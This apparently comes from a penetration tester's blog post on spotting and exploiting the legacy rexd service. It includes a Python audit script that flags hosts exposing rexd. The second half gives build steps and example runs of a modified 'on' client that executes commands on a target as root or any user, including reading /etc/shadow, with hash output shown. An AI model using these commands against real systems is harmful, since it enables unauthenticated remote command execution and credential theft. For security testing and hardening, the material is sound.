Rexd Client For Linux
I recently encountered the rexd service running on a host I was testing. This is a really old-school UNIX service which you don't see much on modern networks (in my experience at least). It's well known that it's insecure: it basically lets you run any command on the host as any user you like with no authentication.
This post briefly covers how to identify the service and how to exploit it. I've also modified the rexd client from SATAN to compile cleanly on Linux (download link below…).
Identifying Hosts Running Rexd
Use rpcinfo to list the RPC services registered on the target host (assuming the portmapper is running – 111/TCP). If rexd (program number 100017) is listed, you're in luck:
$ rpcinfo -p 10.0.0.1
   program vers proto   port
    100000    4   tcp    111  rpcbind
    100000    3   tcp    111  rpcbind
    100000    2   tcp    111  rpcbind
    100000    4   udp    111  rpcbind
    100000    3   udp    111  rpcbind
    100000    2   udp    111  rpcbind
    100229    1   tcp  32795  metad
    100229    2   tcp  32795  metad
    100230    1   tcp  32796  metamhd
    100242    1   tcp  32797  rpc.metamedd
    100017    1   tcp  32798  rexd   <---
    ...
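The same check can be automated for an inventory of hosts. The following Python is an added audit helper, not code from the post or from the SATAN `on` client: it parses `rpcinfo -p` output and flags program number 100017 so that hosts still exposing rexd can be found and the service disabled. The sample listing is constructed to mirror the one above, and `audit_host` assumes a local `rpcinfo` binary.

```python
import re
import subprocess

REXD_PROG = 100017  # RPC program number for rexd (Remote Execution Daemon)

# Constructed sample shaped like the rpcinfo listing in the post; not real output.
SAMPLE_RPCINFO = """\
   program vers proto   port
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100229    1   tcp  32795  metad
    100017    1   tcp  32798  rexd
"""

# program  vers  proto  port  [name]; the name column is resolved from the local /etc/rpc
LINE_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)(?:\s+(\S+))?\s*$")

def parse_rpcinfo(text):
    """Return one dict per registration line in `rpcinfo -p` output."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:  # header line or blank line
            continue
        prog, vers, proto, port, name = m.groups()
        entries.append({"program": int(prog), "version": int(vers),
                        "proto": proto, "port": int(port), "name": name or ""})
    return entries

def rexd_registrations(entries):
    """Match on the program number, not the name: the name is resolved from the
    scanner's own /etc/rpc and may be blank or differ on a minimal system."""
    return [e for e in entries if e["program"] == REXD_PROG]

def audit_host(host):
    """Run rpcinfo -p against host (assumes a local rpcinfo binary) and return
    the rexd registrations found; empty if none or the portmapper did not answer."""
    try:
        proc = subprocess.run(["rpcinfo", "-p", host], capture_output=True,
                              text=True, timeout=10, check=False)
    except (OSError, subprocess.TimeoutExpired):
        return []
    return rexd_registrations(parse_rpcinfo(proc.stdout))

if __name__ == "__main__":
    for e in rexd_registrations(parse_rpcinfo(SAMPLE_RPCINFO)):
        print(f"rexd on {e['proto']}/{e['port']} (v{e['version']}): disable or firewall it")
```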
Exploitation is as simple as finding a client and running it. Solaris hosts usually have the client "on" installed by default. If you've got a Solaris VM, or you've already broken into another Solaris machine during your pentest, you can probably use that.
Alternatively, if you’d prefer a Linux client, it seems you’re out of luck. Modern distros don’t seem to have such a client (I checked Gentoo and Debian). SATAN (an old-school pentesting toolkit) has one which I modified to compile cleanly and be a bit easier to use. Download my modified rexd client here.
Update (2011-11): Thanks to Hank Leininger for the patch. Now supports the -p argument.
To compile / install:
$ tar xfz on.tar.gz
$ cd on
$ make
$ sudo make install

$ on
Usage: on [ -u uid ] [ -g gid ] [ -h hostname ] ip command...

Examples:
  on 10.0.0.1 cat /etc/shadow
  on 10.0.0.1 -u 1 10.0.0.1 id

on is a client for rexd, the Remote Execution Daemon.
To check if a target is running rexd, do 'rpcinfo -p ip' and check for rexd (program number 100017).
If rexd is running on the target you should be able to execute commands on the remote host as any user you like.
This program is a minor modification of 'rex' by Wietse Venema, part of SATAN: http://www.porcupine.org/satan/mirrors.html

$ on 10.0.0.1 id
uid=0(root) gid=0(root)
$ on -u 1 -g 2 10.0.0.1 id
uid=1(daemon) gid=2(bin)
$ on 10.0.0.1 cat /etc/shadow
root:.VLpoFoQoa8eY:14175::::::
daemon:NP:6445::::::
bin:NP:6445::::::
...